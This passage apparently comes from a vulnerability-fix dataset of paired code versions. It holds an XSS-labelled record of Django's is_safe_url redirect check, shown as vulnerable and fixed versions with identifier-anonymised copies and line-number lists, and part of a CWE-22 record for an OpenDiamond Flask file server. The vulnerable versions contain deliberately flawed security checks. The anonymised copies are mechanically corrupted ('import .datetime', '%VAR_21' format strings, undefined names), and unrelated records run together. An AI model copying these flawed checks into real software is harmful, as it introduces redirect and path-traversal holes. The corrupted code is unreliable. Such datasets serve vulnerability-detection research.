return original_urlencode(
[(force_str(k),
[force_str(i) for i in v] if isinstance(v, (list, tuple)) else force_str(v))
for k, v in query],
doseq)
def cookie_date(epoch_seconds=None):
"""
Formats the time to ensure compatibility with Netscape's cookie standard.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD-Mon-YYYY HH:MM:SS GMT'.
"""
rfcdate = formatdate(epoch_seconds)
return '%s-%s-%s GMT' % (rfcdate[:7], rfcdate[8:11], rfcdate[12:25])
def http_date(epoch_seconds=None):
"""
Formats the time to match the RFC1123 date format as specified by HTTP
RFC2616 section 3.3.1.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD Mon YYYY HH:MM:SS GMT'.
"""
return formatdate(epoch_seconds, usegmt=True)
def parse_http_date(date):
"""
Parses a date format as specified by HTTP RFC2616 section 3.3.1.
The three formats allowed by the RFC are accepted, even if only the first
one is still in widespread use.
Returns an integer expressed in seconds since the epoch, in UTC.
"""
# emails.Util.parsedate does the job for RFC1123 dates; unfortunately
# RFC2616 makes it mandatory to support RFC850 dates too. So we roll
# our own RFC-compliant parsing.
for regex in RFC1123_DATE, RFC850_DATE, ASCTIME_DATE:
m = regex.match(date)
if m is not None:
break
else:
raise ValueError("%r is not in a valid HTTP date format" % date)
try:
year = int(m.group('year'))
if year < 100:
if year < 70:
year += 2000
else:
year += 1900
month = MONTHS.index(m.group('mon').lower()) + 1
day = int(m.group('day'))
hour = int(m.group('hour'))
min = int(m.group('min'))
sec = int(m.group('sec'))
result = datetime.datetime(year, month, day, hour, min, sec)
return calendar.timegm(result.utctimetuple())
except Exception:
six.reraise(ValueError, ValueError("%r is not a valid date" % date), sys.exc_info()[2])
def parse_http_date_safe(date):
"""
Same as parse_http_date, but returns None if the input is invalid.
"""
try:
return parse_http_date(date)
except Exception:
pass
# Base 36 functions: useful for generating compact URLs
def base36_to_int(s):
"""
Converts a base 36 string to an ``int``. Raises ``ValueError` if the
input won't fit into an int.
"""
# To prevent overconsumption of server resources, reject any
# base36 string that is long than 13 base36 digits (13 digits
# is sufficient to base36-encode any 64-bit integer)
if len(s) > 13:
raise ValueError("Base36 input too large")
value = int(s, 36)
# ... then do a final check that the value will fit into an int to avoid
# returning a long (#15067). The long type was removed in Python 3.
if six.PY2 and value > sys.maxint:
raise ValueError("Base36 input too large")
return value
def int_to_base36(i):
"""
Converts an integer to a base36 string
"""
char_set = '0123456789abcdefghijklmnopqrstuvwxyz'
if i < 0:
raise ValueError("Negative base36 conversion input.")
if six.PY2:
if not isinstance(i, six.integer_types):
raise TypeError("Non-integer base36 conversion input.")
if i > sys.maxint:
raise ValueError("Base36 conversion input too large.")
if i < 36:
return char_set[i]
b36 = ''
while i != 0:
i, n = divmod(i, 36)
b36 = char_set[n] + b36
return b36
def urlsafe_base64_encode(s):
"""
Encodes a bytestring in base64 for use in URLs, stripping any trailing
equal signs.
"""
return base64.urlsafe_b64encode(s).rstrip(b'\n=')
def urlsafe_base64_decode(s):
"""
Decodes a base64 encoded string, adding back any trailing equal signs that
might have been stripped.
"""
s = force_bytes(s)
try:
return base64.urlsafe_b64decode(s.ljust(len(s) + len(s) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
def parse_etags(etag_str):
"""
Parses a string with one or several etags passed in If-None-Match and
If-Match headers by the rules in RFC 2616. Returns a list of etags
without surrounding double quotes (") and unescaped from \<CHAR>.
"""
etags = ETAG_MATCH.findall(etag_str)
if not etags:
# etag_str has wrong format, treat it as an opaque string then
return [etag_str]
etags = [e.encode('ascii').decode('unicode_escape') for e in etags]
return etags
def quote_etag(etag):
"""
Wraps a string in double quotes escaping contents as necessary.
"""
return '"%s"' % etag.replace('\\', '\\\\').replace('"', '\\"')
def unquote_etag(etag):
"""
Unquote an ETag string; i.e. revert quote_etag().
"""
return etag.strip('"').replace('\\"', '"').replace('\\\\', '\\') if etag else etag
def is_same_domain(host, pattern):
"""
Return ``True`` if the host is either an exact match or a match
to the wildcard pattern.
Any pattern beginning with a period matches a domain and all of its
subdomains. (e.g. ``.example.com`` matches ``example.com`` and
``foo.example.com``). Anything else is an exact string match.
"""
if not pattern:
return False
pattern = pattern.lower()
return (
pattern[0] == '.' and (host.endswith(pattern) or host == pattern[1:]) or
pattern == host
)
def is_safe_url(url, host=None):
"""
Return ``True`` if the url is a safe redirection (i.e. it doesn't point to
a different host and uses a safe scheme).
Always returns ``False`` on an empty url.
"""
if url is not None:
url = url.strip()
if not url:
return False
# Chrome treats \ completely as / in paths but it could be part of some
# basic auth credentials so we need to check both URLs.
return _is_safe_url(url, host) and _is_safe_url(url.replace('\\', '/'), host)
def _is_safe_url(url, host):
# Chrome considers any URL with more than two slashes to be absolute, but
# urlparse is not so flexible. Treat any url with three slashes as unsafe.
if url.startswith('///'):
return False
url_info = urlparse(url)
# Forbid URLs like http:///example.com - with a scheme, but without a hostname.
# In that URL, example.com is not the hostname but, a path component. However,
# Chrome will still consider example.com to be the hostname, so we must not
# allow this syntax.
if not url_info.netloc and url_info.scheme:
return False
# Forbid URLs that start with control characters. Some browsers (like
# Chrome) ignore quite a few control characters at the start of a
# URL and might consider the URL as scheme relative.
if unicodedata.category(url[0])[0] == 'C':
return False
return ((not url_info.netloc or url_info.netloc == host) and
(not url_info.scheme or url_info.scheme in ['http', 'https']))
| xss | {
"code": [
" url = url.replace('\\\\', '/')"
],
"line_no": [
294
]
} | {
"code": [
"def _is_safe_url(url, host):"
],
"line_no": [
298
]
} | from __future__ import unicode_literals
import base64
import calendar
import .datetime
import re
import .sys
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from django.utils import .six
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.functional import keep_lazy_text
from django.utils.six.moves.urllib.parse import (
quote, quote_plus, unquote, unquote_plus, FUNC_4 as original_urlencode,
urlparse,
)
VAR_0 = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
VAR_1 = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
VAR_2 = r'(?P<VAR_36>\d{2})'
VAR_3 = r'(?P<VAR_36>[ \d]\d)'
VAR_4 = r'(?P<mon>\w{3})'
VAR_5 = r'(?P<VAR_34>\d{4})'
VAR_6 = r'(?P<VAR_34>\d{2})'
VAR_7 = r'(?P<VAR_37>\d{2}):(?P<VAR_38>\d{2}):(?P<VAR_39>\d{2})'
VAR_8 = re.compile(r'^\w{3}, %VAR_21 %VAR_21 %VAR_21 %s GMT$' % (VAR_2, VAR_4, VAR_5, VAR_7))
VAR_9 = re.compile(r'^\w{6,9}, %VAR_21-%VAR_21-%VAR_21 %s GMT$' % (VAR_2, VAR_4, VAR_6, VAR_7))
VAR_10 = re.compile(r'^\w{3} %VAR_21 %VAR_21 %VAR_21 %s$' % (VAR_4, VAR_3, VAR_7, VAR_5))
VAR_11 = str(":/?#[]@")
VAR_12 = str("!$&'()*+,;=")
VAR_13 = {
'http': 80,
'https': 443,
}
@keep_lazy_text
def FUNC_0(VAR_14, VAR_15='/'):
return force_text(quote(force_str(VAR_14), force_str(VAR_15)))
@keep_lazy_text
def FUNC_1(VAR_14, VAR_15=''):
return force_text(quote_plus(force_str(VAR_14), force_str(VAR_15)))
@keep_lazy_text
def FUNC_2(VAR_16):
return force_text(unquote(force_str(VAR_16)))
@keep_lazy_text
def FUNC_3(VAR_16):
return force_text(unquote_plus(force_str(VAR_16)))
def FUNC_4(VAR_17, VAR_18=0):
if isinstance(VAR_17, MultiValueDict):
VAR_17 = query.lists()
elif hasattr(VAR_17, 'items'):
VAR_17 = query.items()
return original_urlencode(
[(force_str(k),
[force_str(VAR_22) for VAR_22 in v] if isinstance(v, (list, tuple)) else force_str(v))
for k, v in VAR_17],
VAR_18)
def FUNC_5(VAR_19=None):
VAR_27 = formatdate(VAR_19)
return '%VAR_21-%s-%VAR_21 GMT' % (VAR_27[:7], VAR_27[8:11], VAR_27[12:25])
def FUNC_6(VAR_19=None):
return formatdate(VAR_19, usegmt=True)
def FUNC_7(VAR_20):
for regex in VAR_8, VAR_9, VAR_10:
VAR_33 = regex.match(VAR_20)
if VAR_33 is not None:
break
else:
raise ValueError("%r is not in a valid HTTP VAR_20 format" % VAR_20)
try:
VAR_34 = int(VAR_33.group('year'))
if VAR_34 < 100:
if VAR_34 < 70:
VAR_34 += 2000
else:
VAR_34 += 1900
VAR_35 = VAR_1.index(VAR_33.group('mon').lower()) + 1
VAR_36 = int(VAR_33.group('day'))
VAR_37 = int(VAR_33.group('hour'))
VAR_38 = int(VAR_33.group('min'))
VAR_39 = int(VAR_33.group('sec'))
VAR_40 = datetime.datetime(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38, VAR_39)
return calendar.timegm(VAR_40.utctimetuple())
except Exception:
six.reraise(ValueError, ValueError("%r is not a valid date" % VAR_20), sys.exc_info()[2])
def FUNC_8(VAR_20):
try:
return FUNC_7(VAR_20)
except Exception:
pass
def FUNC_9(VAR_21):
if len(VAR_21) > 13:
raise ValueError("Base36 input too large")
VAR_28 = int(VAR_21, 36)
if six.PY2 and VAR_28 > sys.maxint:
raise ValueError("Base36 input too large")
return VAR_28
def FUNC_10(VAR_22):
VAR_29 = '0123456789abcdefghijklmnopqrstuvwxyz'
if VAR_22 < 0:
raise ValueError("Negative base36 conversion input.")
if six.PY2:
if not isinstance(VAR_22, six.integer_types):
raise TypeError("Non-integer base36 conversion input.")
if VAR_22 > sys.maxint:
raise ValueError("Base36 conversion input too large.")
if VAR_22 < 36:
return VAR_29[VAR_22]
VAR_30 = ''
while VAR_22 != 0:
VAR_22, VAR_41 = divmod(VAR_22, 36)
VAR_30 = VAR_29[VAR_41] + VAR_30
return VAR_30
def FUNC_11(VAR_21):
return base64.urlsafe_b64encode(VAR_21).rstrip(b'\VAR_41=')
def FUNC_12(VAR_21):
VAR_21 = force_bytes(VAR_21)
try:
return base64.urlsafe_b64decode(VAR_21.ljust(len(VAR_21) + len(VAR_21) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
def FUNC_13(VAR_23):
VAR_31 = VAR_0.findall(VAR_23)
if not VAR_31:
return [VAR_23]
VAR_31 = [e.encode('ascii').decode('unicode_escape') for e in VAR_31]
return VAR_31
def FUNC_14(VAR_24):
return '"%s"' % VAR_24.replace('\\', '\\\\').replace('"', '\\"')
def FUNC_15(VAR_24):
return VAR_24.strip('"').replace('\\"', '"').replace('\\\\', '\\') if VAR_24 else VAR_24
def FUNC_16(VAR_25, VAR_26):
if not VAR_26:
return False
VAR_26 = pattern.lower()
return (
VAR_26[0] == '.' and (VAR_25.endswith(VAR_26) or VAR_25 == VAR_26[1:]) or
VAR_26 == VAR_25
)
def FUNC_17(VAR_14, VAR_25=None):
if VAR_14 is not None:
VAR_14 = VAR_14.strip()
if not VAR_14:
return False
VAR_14 = VAR_14.replace('\\', '/')
if VAR_14.startswith('///'):
return False
VAR_32 = urlparse(VAR_14)
if not VAR_32.netloc and VAR_32.scheme:
return False
if unicodedata.category(VAR_14[0])[0] == 'C':
return False
return ((not VAR_32.netloc or VAR_32.netloc == VAR_25) and
(not VAR_32.scheme or VAR_32.scheme in ['http', 'https']))
| from __future__ import unicode_literals
import base64
import calendar
import .datetime
import re
import .sys
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from django.utils import .six
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.functional import keep_lazy_text
from django.utils.six.moves.urllib.parse import (
quote, quote_plus, unquote, unquote_plus, FUNC_4 as original_urlencode,
urlparse,
)
VAR_0 = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
VAR_1 = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
VAR_2 = r'(?P<VAR_36>\d{2})'
VAR_3 = r'(?P<VAR_36>[ \d]\d)'
VAR_4 = r'(?P<mon>\w{3})'
VAR_5 = r'(?P<VAR_34>\d{4})'
VAR_6 = r'(?P<VAR_34>\d{2})'
VAR_7 = r'(?P<VAR_37>\d{2}):(?P<VAR_38>\d{2}):(?P<VAR_39>\d{2})'
VAR_8 = re.compile(r'^\w{3}, %VAR_21 %VAR_21 %VAR_21 %s GMT$' % (VAR_2, VAR_4, VAR_5, VAR_7))
VAR_9 = re.compile(r'^\w{6,9}, %VAR_21-%VAR_21-%VAR_21 %s GMT$' % (VAR_2, VAR_4, VAR_6, VAR_7))
VAR_10 = re.compile(r'^\w{3} %VAR_21 %VAR_21 %VAR_21 %s$' % (VAR_4, VAR_3, VAR_7, VAR_5))
VAR_11 = str(":/?#[]@")
VAR_12 = str("!$&'()*+,;=")
VAR_13 = {
'http': 80,
'https': 443,
}
@keep_lazy_text
def FUNC_0(VAR_14, VAR_15='/'):
return force_text(quote(force_str(VAR_14), force_str(VAR_15)))
@keep_lazy_text
def FUNC_1(VAR_14, VAR_15=''):
return force_text(quote_plus(force_str(VAR_14), force_str(VAR_15)))
@keep_lazy_text
def FUNC_2(VAR_16):
return force_text(unquote(force_str(VAR_16)))
@keep_lazy_text
def FUNC_3(VAR_16):
return force_text(unquote_plus(force_str(VAR_16)))
def FUNC_4(VAR_17, VAR_18=0):
if isinstance(VAR_17, MultiValueDict):
VAR_17 = query.lists()
elif hasattr(VAR_17, 'items'):
VAR_17 = query.items()
return original_urlencode(
[(force_str(k),
[force_str(VAR_22) for VAR_22 in v] if isinstance(v, (list, tuple)) else force_str(v))
for k, v in VAR_17],
VAR_18)
def FUNC_5(VAR_19=None):
VAR_27 = formatdate(VAR_19)
return '%VAR_21-%s-%VAR_21 GMT' % (VAR_27[:7], VAR_27[8:11], VAR_27[12:25])
def FUNC_6(VAR_19=None):
return formatdate(VAR_19, usegmt=True)
def FUNC_7(VAR_20):
for regex in VAR_8, VAR_9, VAR_10:
VAR_33 = regex.match(VAR_20)
if VAR_33 is not None:
break
else:
raise ValueError("%r is not in a valid HTTP VAR_20 format" % VAR_20)
try:
VAR_34 = int(VAR_33.group('year'))
if VAR_34 < 100:
if VAR_34 < 70:
VAR_34 += 2000
else:
VAR_34 += 1900
VAR_35 = VAR_1.index(VAR_33.group('mon').lower()) + 1
VAR_36 = int(VAR_33.group('day'))
VAR_37 = int(VAR_33.group('hour'))
VAR_38 = int(VAR_33.group('min'))
VAR_39 = int(VAR_33.group('sec'))
VAR_40 = datetime.datetime(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38, VAR_39)
return calendar.timegm(VAR_40.utctimetuple())
except Exception:
six.reraise(ValueError, ValueError("%r is not a valid date" % VAR_20), sys.exc_info()[2])
def FUNC_8(VAR_20):
try:
return FUNC_7(VAR_20)
except Exception:
pass
def FUNC_9(VAR_21):
if len(VAR_21) > 13:
raise ValueError("Base36 input too large")
VAR_28 = int(VAR_21, 36)
if six.PY2 and VAR_28 > sys.maxint:
raise ValueError("Base36 input too large")
return VAR_28
def FUNC_10(VAR_22):
VAR_29 = '0123456789abcdefghijklmnopqrstuvwxyz'
if VAR_22 < 0:
raise ValueError("Negative base36 conversion input.")
if six.PY2:
if not isinstance(VAR_22, six.integer_types):
raise TypeError("Non-integer base36 conversion input.")
if VAR_22 > sys.maxint:
raise ValueError("Base36 conversion input too large.")
if VAR_22 < 36:
return VAR_29[VAR_22]
VAR_30 = ''
while VAR_22 != 0:
VAR_22, VAR_41 = divmod(VAR_22, 36)
VAR_30 = VAR_29[VAR_41] + VAR_30
return VAR_30
def FUNC_11(VAR_21):
return base64.urlsafe_b64encode(VAR_21).rstrip(b'\VAR_41=')
def FUNC_12(VAR_21):
VAR_21 = force_bytes(VAR_21)
try:
return base64.urlsafe_b64decode(VAR_21.ljust(len(VAR_21) + len(VAR_21) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
def FUNC_13(VAR_23):
VAR_31 = VAR_0.findall(VAR_23)
if not VAR_31:
return [VAR_23]
VAR_31 = [e.encode('ascii').decode('unicode_escape') for e in VAR_31]
return VAR_31
def FUNC_14(VAR_24):
return '"%s"' % VAR_24.replace('\\', '\\\\').replace('"', '\\"')
def FUNC_15(VAR_24):
return VAR_24.strip('"').replace('\\"', '"').replace('\\\\', '\\') if VAR_24 else VAR_24
def FUNC_16(VAR_25, VAR_26):
if not VAR_26:
return False
VAR_26 = pattern.lower()
return (
VAR_26[0] == '.' and (VAR_25.endswith(VAR_26) or VAR_25 == VAR_26[1:]) or
VAR_26 == VAR_25
)
def FUNC_17(VAR_14, VAR_25=None):
if VAR_14 is not None:
VAR_14 = VAR_14.strip()
if not VAR_14:
return False
return FUNC_18(VAR_14, VAR_25) and FUNC_18(VAR_14.replace('\\', '/'), VAR_25)
def FUNC_18(VAR_14, VAR_25):
if VAR_14.startswith('///'):
return False
VAR_32 = urlparse(VAR_14)
if not VAR_32.netloc and VAR_32.scheme:
return False
if unicodedata.category(VAR_14[0])[0] == 'C':
return False
return ((not VAR_32.netloc or VAR_32.netloc == VAR_25) and
(not VAR_32.scheme or VAR_32.scheme in ['http', 'https']))
| [
2,
11,
20,
22,
33,
36,
41,
42,
52,
53,
63,
64,
72,
73,
81,
82,
98,
99,
103,
107,
112,
113,
118,
122,
126,
127,
131,
134,
137,
138,
139,
162,
163,
172,
173,
174,
175,
181,
182,
183,
187,
188,
192,
193,
213,
214,
221,
222,
233,
234,
243,
247,
248,
254,
255,
261,
262,
267,
274,
280,
281,
286,
293,
295,
296,
300,
301,
302,
303,
306,
307,
308,
313,
45,
46,
47,
48,
49,
50,
56,
57,
58,
59,
60,
61,
67,
68,
69,
70,
76,
77,
78,
79,
84,
85,
86,
87,
88,
101,
102,
103,
104,
105,
106,
107,
108,
109,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
129,
130,
131,
132,
133,
134,
135,
136,
165,
166,
167,
177,
178,
179,
180,
195,
196,
197,
216,
217,
218,
219,
224,
225,
226,
227,
236,
237,
238,
239,
240,
250,
251,
252,
257,
258,
259,
264,
265,
266,
267,
268,
269,
270,
271,
283,
284,
285,
286,
287,
288
] | [
2,
11,
20,
22,
33,
36,
41,
42,
52,
53,
63,
64,
72,
73,
81,
82,
98,
99,
103,
107,
112,
113,
118,
122,
126,
127,
131,
134,
137,
138,
139,
162,
163,
172,
173,
174,
175,
181,
182,
183,
187,
188,
192,
193,
213,
214,
221,
222,
233,
234,
243,
247,
248,
254,
255,
261,
262,
267,
274,
280,
281,
286,
293,
294,
296,
297,
299,
300,
304,
305,
306,
307,
310,
311,
312,
317,
45,
46,
47,
48,
49,
50,
56,
57,
58,
59,
60,
61,
67,
68,
69,
70,
76,
77,
78,
79,
84,
85,
86,
87,
88,
101,
102,
103,
104,
105,
106,
107,
108,
109,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
129,
130,
131,
132,
133,
134,
135,
136,
165,
166,
167,
177,
178,
179,
180,
195,
196,
197,
216,
217,
218,
219,
224,
225,
226,
227,
236,
237,
238,
239,
240,
250,
251,
252,
257,
258,
259,
264,
265,
266,
267,
268,
269,
270,
271,
283,
284,
285,
286,
287,
288
] |
0CWE-22
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.utils import safe_join
from opendiamond.dataretriever.util import read_file_list, write_data
BASEURL = 'augment'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
KEYWORD = 'yellowthroat'
"""
Example url:
/augment/root/<ROOT_DIR>/distributed/<id>of<N>/ \
keywords/<d/r ([d]eterminant/[r]andom)>_<random_seed>_<base_rate>
/augment/root/STREAM/distributed/1of2/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = 'STREAM'
DATAROOT = config.dataroot
scope_blueprint = Blueprint('augment_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>' +
'/start/<int:start>/limit/<int:limit>')
def get_scope(rootdir, index=0, total=1, params=None, start=0, limit=sys.maxsize):
global KEYWORD
if rootdir == "0":
rootdir = INDEXDIR
rootdir = _get_obj_absolute_path(rootdir)
seed = None
percentage = 0.
seed, percentage = decode_params(params)
# Assuming the same positive list is present in all the servers
# Always create a new index file
base_list, KEYWORD = create_index(rootdir, percentage, seed, index, total)
total_entries = len(base_list)
start = start if start > 0 else 0
end = min(total_entries, start + limit) if limit > 0 else total_entries
base_list = base_list[start:end]
total_entries = end - start
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
for path in base_list:
path = path.strip()
yield _get_object_element(object_path=path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
"""
Decodes the params which are '_' seperated
<[d]eterminant/[r]andom>_<random_seed>_<baserate>
"""
keywords = params.split('_')
mix_type = keywords[0]
seed = None
if len(keywords) > 1:
seed = int(keywords[1])
if mix_type == 'r' or seed is None:
seed = random.randrange(10000)
percentage = 0.1 # default base_rate = 0.1%
if len(keywords) > 2:
percentage = float(keywords[2])
return seed, round(percentage, 4)
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
meta = {'_gt_label': KEYWORD}
if KEYWORD in path:
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', present=True)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
@scope_blueprint.route('/meta/<path:present>')
def get_object_meta(present=False):
attrs = dict()
if present:
attrs['_gt_label'] = KEYWORD
return jsonify(attrs)
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_absolute_path(obj_path):
return safe_join(DATAROOT, obj_path)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
def create_index(base_dir, base_rate=0.05, seed=42, rank=0, total_servers=1):
"""
Creates Index List File:
Assuming name of files NEGATIVE (e.g:subset YFCC), POSITIVE
"""
filepath_split = ['STREAM', "{:.2f}".format(base_rate), str(rank), str(total_servers), str(seed)]
filepath = '_'.join(filepath_split)
filepath = os.path.join(base_dir, filepath)
positive_path = os.path.join(base_dir, 'POSITIVE')
negative_path = os.path.join(base_dir, 'NEGATIVE')
positive_firstline = open(positive_path).readline().rstrip()
keyword = positive_firstline.split('/')[-2] # Assuming all positives are in the same parent dir
_log.info("Dir {} BR: {} Seed:{} FP{}".format(base_dir, base_rate, seed, filepath))
sys.stdout.flush()
if not os.path.exists(filepath):
positive_data = read_file_list(positive_path) # same across servers
negative_data = read_file_list(negative_path) # different across servers
random.Random(seed).shuffle(positive_data)
random.Random(seed).shuffle(negative_data)
len_positive = len(positive_data)
start_idx = int(rank * (1.0 / total_servers) * len_positive)
end_idx = int((rank+1) * (1.0 / total_servers) * len_positive)
positive_data = positive_data[start_idx:end_idx]
len_positive = len(positive_data)
negative_sample = int(len_positive * (100./base_rate -1))
negative_data = negative_data[:negative_sample]
return write_data(filepath, [negative_data, positive_data], seed), keyword
return read_file_list(filepath), keyword
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
from opendiamond.dataretriever.util import read_file_list, write_data
BASEURL = 'augment'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
KEYWORD = 'yellowthroat'
"""
Example url:
/augment/root/<ROOT_DIR>/distributed/<id>of<N>/ \
keywords/<d/r ([d]eterminant/[r]andom)>_<random_seed>_<base_rate>
/augment/root/STREAM/distributed/1of2/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = 'STREAM'
DATAROOT = config.dataroot
scope_blueprint = Blueprint('augment_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>' +
'/start/<int:start>/limit/<int:limit>')
def get_scope(rootdir, index=0, total=1, params=None, start=0, limit=sys.maxsize):
global KEYWORD
if rootdir == "0":
rootdir = INDEXDIR
rootdir = _get_obj_absolute_path(rootdir)
seed = None
percentage = 0.
seed, percentage = decode_params(params)
# Assuming the same positive list is present in all the servers
# Always create a new index file
base_list, KEYWORD = create_index(rootdir, percentage, seed, index, total)
total_entries = len(base_list)
start = start if start > 0 else 0
end = min(total_entries, start + limit) if limit > 0 else total_entries
base_list = base_list[start:end]
total_entries = end - start
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
for path in base_list:
path = path.strip()
yield _get_object_element(object_path=path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
"""
Decodes the params which are '_' seperated
<[d]eterminant/[r]andom>_<random_seed>_<baserate>
"""
keywords = params.split('_')
mix_type = keywords[0]
seed = None
if len(keywords) > 1:
seed = int(keywords[1])
if mix_type == 'r' or seed is None:
seed = random.randrange(10000)
percentage = 0.1 # default base_rate = 0.1%
if len(keywords) > 2:
percentage = float(keywords[2])
return seed, round(percentage, 4)
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
meta = {'_gt_label': KEYWORD}
if KEYWORD in path:
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', present=True)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
@scope_blueprint.route('/meta/<path:present>')
def get_object_meta(present=False):
attrs = dict()
if present:
attrs['_gt_label'] = KEYWORD
return jsonify(attrs)
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_absolute_path(obj_path):
return safe_join(DATAROOT, obj_path)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
def create_index(base_dir, base_rate=0.05, seed=42, rank=0, total_servers=1):
"""
Creates Index List File:
Assuming name of files NEGATIVE (e.g:subset YFCC), POSITIVE
"""
filepath_split = ['STREAM', "{:.2f}".format(base_rate), str(rank), str(total_servers), str(seed)]
filepath = '_'.join(filepath_split)
filepath = os.path.join(base_dir, filepath)
positive_path = os.path.join(base_dir, 'POSITIVE')
negative_path = os.path.join(base_dir, 'NEGATIVE')
positive_firstline = open(positive_path).readline().rstrip()
